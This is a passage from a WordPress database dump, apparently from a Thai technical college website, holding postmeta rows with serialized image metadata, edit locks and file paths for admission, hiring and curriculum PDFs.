'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:25:\"2019/12/1618911008538.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"1618911008538-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"1618911008538-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"1618911008538-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"1618911008538-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28432, 11591, '_wp_attached_file', '2019/12/1618911008538-1.jpg'),
(28433, 11591, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:940;s:6:\"height\";i:788;s:4:\"file\";s:27:\"2019/12/1618911008538-1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"1618911008538-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"1618911008538-1-300x251.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"1618911008538-1-768x644.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:644;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"1618911008538-1-358x300.jpg\";s:5:\"width\";i:358;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28440, 11597, '_edit_lock', '1619591068:14'),
(28441, 11597, '_edit_last', '14'),
(28442, 11598, '_wp_attached_file', '2021/04/รายชื่อมีสิทธิ์สอบงานประกัน.pdf'),
(28445, 11597, '_hide_featured', NULL),
(28477, 11606, '_edit_lock', '1620190337:12'),
(28478, 11606, '_edit_last', '14'),
(28479, 11607, '_wp_attached_file', '2021/05/20210430152404626.pdf'),
(28480, 11608, '_wp_attached_file', '2021/05/20210430152404626-1.pdf'),
(28483, 11606, '_hide_featured', NULL),
(28490, 11611, '_wp_attached_file', '2019/12/Untitled-1.jpg'),
(28491, 11611, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2019/12/Untitled-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28492, 11613, '_wp_attached_file', '2019/12/Untitled-1-1.jpg'),
(28493, 11613, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:600;s:4:\"file\";s:24:\"2019/12/Untitled-1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-300x120.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:120;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-768x307.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:307;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-1-1-1024x410.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:410;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"Untitled-1-1-400x160.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28500, 11617, '_edit_lock', '1620286971:14'),
(28501, 11617, '_edit_last', '14'),
(28502, 11618, '_wp_attached_file', '2021/05/กำหนดการมอบตัวนักเรียน-นักศึกษา-ปีการศึกษา-2564.pdf'),
(28505, 11617, '_hide_featured', NULL),
(28508, 11622, '_edit_lock', '1620206852:14'),
(28509, 11622, '_edit_last', '14'),
(28510, 11623, '_wp_attached_file', '2021/05/ครุภัณฑ์.pdf'),
(28511, 11624, '_wp_attached_file', '2021/05/ครุภัณฑ์-1.pdf'),
(28512, 11625, '_wp_attached_file', '2021/05/ครุภัณฑ์-2.pdf'),
(28515, 11622, '_hide_featured', NULL),
(28522, 11629, '_wp_attached_file', '2021/05/หลักสูตรปวช.62ที่เปิดสอน.pdf'),
(28523, 11630, '_wp_attached_file', '2021/05/หลักสูตรปวส.63ที่เปิดสอน.pdf'),
(28524, 11631, '_wp_attached_file', '2021/05/หลักสูตรปวส.63ที่เปิดสอน-1.pdf'),
(28525, 11632, '_wp_attached_file', '2021/05/หลักสูตรปวส.63ที่เปิดสอน-2.pdf'),
(28536, 11635, '_edit_lock', '1621842887:14'),
(28537, 11635, '_edit_last', '14'),
(28538, 11636, '_wp_attached_file', '2021/05/รับสมัคร-จนท.บัญชี.pdf'),
(28541, 11635, '_hide_featured', NULL),
(28554, 11647, '_wp_attached_file', '2021/05/รับสมัครจนท.-อศจ.กับ-บัญชี.pdf'),
(28555, 11648, '_wp_attached_file', '2021/05/รับสมัครจนท.-อศจ.กับ-บัญชี-1.pdf'),
(28562, 11650, '_edit_lock', '1622088171:14'),
(28563, 11650, '_edit_last', '14'),
(28564, 11651, '_wp_attached_file', '2021/05/รับสมัครครูพิเศษสอน-ชก.ชย.ชอ.โลจิสติกส์.เลข.pdf'),
(28567, 11650, '_hide_featured', NULL),
(28578, 11654, '_wp_attached_file', '2021/05/รับสมัคร-ครูพิเศษสอน.pdf'),
(28589, 11656, '_wp_attached_file', '2021/05/รับสมัครครูพิเศษสอน.pdf'),
(28600, 11658, '_wp_attached_file', '2019/12/20832.jpg'),
(28601, 11658, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:679;s:4:\"file\";s:17:\"2019/12/20832.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"20832-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"20832-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"20832-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"20832-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28602, 11660, '_edit_lock', '1621412171:14'),
(28603, 11660, '_edit_last', '14'),
(28604, 11661, '_wp_attached_file', '2021/05/20210519150320375.pdf'),
(28607, 11660, '_hide_featured', NULL),
(28610, 11663, '_wp_attached_file', '2019/12/อิอิ.png'),
(28611, 11663, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5953;s:6:\"height\";i:1417;s:4:\"file\";s:24:\"2019/12/อิอิ.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"อิอิ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"อิอิ-300x71.png\";s:5:\"width\";i:300;s:6:\"height\";i:71;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"อิอิ-768x183.png\";s:5:\"width\";i:768;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"อิอิ-1024x244.png\";s:5:\"width\";i:1024;s:6:\"height\";i:244;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"อิอิ-400x95.png\";s:5:\"width\";i:400;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28612, 11664, '_edit_lock', '1621495266:14'),
(28613, 11664, '_edit_last', '14'),
(28614, 11665, '_wp_attached_file', '2021/05/กำหนดการมอบตัวนักเรียน-นักศึกษา-ปีการศึกษ.pdf'),
(28617, 11664, '_hide_featured', NULL),
(28620, 11668, '_wp_attached_file', '2019/12/อิอิ-1.png'),
(28621, 11668, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:5953;s:6:\"height\";i:1417;s:4:\"file\";s:26:\"2019/12/อิอิ-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"อิอิ-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"อิอิ-1-300x71.png\";s:5:\"width\";i:300;s:6:\"height\";i:71;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"อิอิ-1-768x183.png\";s:5:\"width\";i:768;s:6:\"height\";i:183;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"อิอิ-1-1024x244.png\";s:5:\"width\";i:1024;s:6:\"height\";i:244;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:25:\"อิอิ-1-400x95.png\";s:5:\"width\";i:400;s:6:\"height\";i:95;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28624, 11671, '_wp_attached_file', '2021/05/ครูพร้อม.png'),
(28625, 11671, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:263;s:6:\"height\";i:173;s:4:\"file\";s:36:\"2021/05/ครูพร้อม.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"ครูพร้อม-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28626, 11671, '_cg_img_link', 'https://www.xn--42c6cjgb4d4d9f.com/'),
(28627, 11671, '_cg_link_target', '_self'),
(28651, 11694, '_edit_lock', '1621497568:14'),
(28652, 11694, '_edit_last', '14'),
(28653, 11695, '_wp_attached_file', '2021/05/messageImage_1621496045449.jpg'),
(28654, 11695, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:263;s:6:\"height\";i:173;s:4:\"file\";s:38:\"2021/05/messageImage_1621496045449.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"messageImage_1621496045449-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28657, 11694, '_hide_featured', NULL),
(28662, 11700, '_wp_attached_file', '2021/05/ประกาศเรื่องมาตรฐานการศึกษาของวิทยาลัยเ.pdf'),
(28663, 11702, '_edit_lock', '1621568955:14'),
(28664, 11702, '_edit_last', '14'),
(28665, 11703, '_wp_attached_file', '2021/05/ส่งการลงนามรับรองรายงานการประเมินคุณภาพ.pdf'),
(28666, 11702, '_hide_featured', NULL),
(28667, 2871, '_cg_img_link', '/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-2/'),
(28668, 2871, '_cg_link_target', ''),
(28669, 11711, '_edit_lock', '1630632433:14'),
(28670, 11711, '_edit_last', '14'),
(28671, 11711, '_cg_img_link', '/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-2/'),
(28672, 11711, '_cg_link_target', ''),
(28673, 11711, '_hide_featured', NULL),
(28674, 1753, '_cg_img_link', 'http://www.technicrayong.ac.th/wp-admin/post.php?post=2871&action=edit'),
(28675, 1753, '_cg_link_target', ''),
(28676, 11715, '_wp_attached_file', '2019/12/1621599634951..jpg'),
(28677, 11715, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:945;s:4:\"file\";s:26:\"2019/12/1621599634951..jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"1621599634951.-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"1621599634951.-300x189.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"1621599634951.-768x484.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:484;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"1621599634951.-1024x645.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:645;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:26:\"1621599634951.-400x252.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28679, 11718, '_edit_lock', '1621843182:14'),
(28680, 11718, '_edit_last', '14'),
(28681, 11719, '_wp_attached_file', '2021/05/ประกาศรายชื่อ.pdf'),
(28684, 11718, '_hide_featured', NULL),
(28687, 11722, '_edit_lock', '1622793222:14'),
(28688, 11722, '_edit_last', '14'),
(28689, 11723, '_wp_attached_file', '2021/05/ประกาศรับสมัครพนักงานราชการครูonline.pdf'),
(28692, 11722, '_hide_featured', NULL),
(28697, 11726, '_wp_attached_file', '2019/12/FB_IMG_1622504310265.jpg'),
(28698, 11726, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:32:\"2019/12/FB_IMG_1622504310265.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1622504310265-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1622504310265-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1622504310265-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"FB_IMG_1622504310265-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"FB_IMG_1622504310265-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28699, 11728, '_wp_attached_file', '2019/12/020664-ประเทศ.jpg'),
(28700, 11728, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:1125;s:4:\"file\";s:37:\"2019/12/020664-ประเทศ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"020664-ประเทศ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"020664-ประเทศ-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"020664-ประเทศ-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"020664-ประเทศ-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:37:\"020664-ประเทศ-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28701, 11730, '_wp_attached_file', '2019/12/3มิย64.jpg'),
(28702, 11730, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1276;s:6:\"height\";i:709;s:4:\"file\";s:24:\"2019/12/3มิย64.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"3มิย64-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"3มิย64-300x167.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"3มิย64-768x427.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"3มิย64-1024x569.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"3มิย64-400x222.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28703, 11734, '_wp_attached_file', '2019/12/24983.jpg'),
(28704, 11734, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:17:\"2019/12/24983.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"24983-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"24983-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"24983-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"24983-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"24983-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28705, 11735, '_wp_attached_file', '2019/12/24983-1.jpg'),
(28706, 11735, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:608;s:4:\"file\";s:19:\"2019/12/24983-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"24983-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"24983-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"24983-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"24983-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"24983-1-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0: